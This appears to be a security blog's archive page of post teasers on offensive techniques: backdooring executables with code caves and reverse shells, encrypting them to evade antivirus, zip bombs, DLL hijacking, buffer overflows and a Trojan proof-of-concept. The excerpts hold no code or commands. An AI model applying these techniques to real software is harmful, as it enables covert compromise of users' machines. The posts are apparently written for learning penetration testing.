Post Explotation Backdooring III

This is the third post on the post-exploitation method based on code caves. In the first part I showed you how to create a basic code cave in an executable to introduce a shell. In the second part I improved its detection rate using natural code caves and hiding the jump to the cave between the instructions of the program. In this part I'm going to show you how to avoid that antivirus detect the shell of the code cave through encryption and decryption at runtime. Thanks again to OscarAkaElvis, who taught me these techniques. Cipher natural code caves This method is based on the previous method. Some antivirus…

0 Comments

Post Explotation Backdooring II

This is the second part of the set of posts about Post Explotation Backdooring. If you haven't read the previous post, I recommend you do so to understand this post. Again I want to thank OscarAkaElvis, who taught me these PE Backdooring techniques.In the previous post we saw how to introduce the code of a reverse shell in a program, creating a Trojan. However, in real life this technique is more than known by antivirus, and it will not work.First of all, because it is very rare for a program to have a JMP as its first instruction.On the other hand, it is easy to verify that the size…

2 Comments

Post Explotation Backdooring I

A few months ago I was in a post-exploitation course taught by my ex colleagueOscarAkaElvis (creator of the tool to audit Airgeddon, which I recommend you try).I also want to warn that this is an advanced technique and you need to have basic knowledge of assembler and reversing. If you don't have them, I recommend the Pentester Academy courses "x86 Assembly Language and Shellcoding on Linux" and "Reverse Engineering Win32 Applications".In this post I'm going to show you how to turn an exe into a Trojan, modifying its code to run a remote terminal. To do this we will start with the simplest way to do it, but also…

2 Comments

Zip Bombs III: Overlapping Bombs

In this last post of the zip bombs series, I'm going to tell you about a new method that has emerged in the last month: overlapping bombs. With this type of bombs has come to achieve the highest rate of decompression of all time: from 46 MB to 4.5 Petabytes. The idea This kind of bomb that has been created by David Fifield has something very different from those of the previous posts: it does not use recursiveness. Instead, it uses file overlapping. This means that after the first decompression it expands completely, so you can't stop with the security measures taken by antivirus and operating systems with the…

0 Comments

Zip Bombs II: Quine Bombs

In last week's post I introduced the zip bombs and explained how to create a zip bomb using the recursion technique. I recommend that you take a look at it if you haven't already done so.  In this new entry I'm going to introduce the Quine Bombs.  Quine Programs In computing, a "quine" program is a program that replicates itself. In other words, a program whose source code generates its own source code as output. This is not easy to achieve. Let's see an example. If we execute print(1) in python, the output would be 1. We need the output to be the same as the input, in this case…

1 Comment

Zip Bomb I: Nested bombs

When a file is compressed, its size is reduced. It's based on a simple principle: if you have a file with the text "aaaaaabbb", which is 9 characters long, you could reduce the size by saving it as "6a3b". Using this rudimentary algorithm, you can decompress the compressed file by multiplying the character that follows it by the number of times the digit indicates.That's why two files that are the same size are compressed at a different compression rate. Following the previous example, the file "aaaaaabbb" would become "6a3b", which means a compression ratio of 4:9, i.e. it is reduced by 66%. However, the file "aaabbaaab" would become "3a2b3a1b",…

4 Comments

DLL Hijacking

Recently I am doing some very interesting Pentester Academy courses. Thanks to them I am learning a lot, since they deal with very particular topics with clear examples.  Today I am going to show you what I have learned about DLL Hijacking. A DLL is a library of dynamic links. There are two types of DLLs: the system DLLs, which provide Windows itself, and the application DLLs, where the application developer divides its functionality into different DLLs. The executables use these DLLs because it involves a modular design of the code and allows the code to be reused. In this way, dependencies are created, and depending on the importance…

0 Comments

Buffer Overflow

In this post we will talk about how one of the oldest computer attacks occurs: buffer overflow. A buffer overflow occurs when a program has reserved an amount of memory X for a variable in the memory space, but at the time of assigning its value, the value has a size greater than X. What happens in this situation is that, if the program does not control well the amount of data that is copied, what does not fit in the reserved space will be written in adjacent memory cells.  A malicious user could use this in his favor to alter other variables whose assigned memory area is contiguous…

0 Comments
Buffer Overflow
Buffer Overflow

Malware PoC: How to do a Trojan Horse

We all know them. They plague our computers. But how are viruses made? In general, talking about creating malware is rare in the area of cybersecurity, because unless you are dedicated to stopping it, there is no ethical reason why you should know how to develop malware. Or is it?  After all, a hacker seeks to push what he has in his hands to the limit. Well, today we have a Trojan horse. Let's see how they do with a little PoC. But first let's review some important terms, so we don't get lost before we start. Terminology Trojan: Malicious software that looks like a harmless program. Modding: modify…

0 Comments
Malware PoC: How to do a Trojan Horse
Malware PoC: troyanos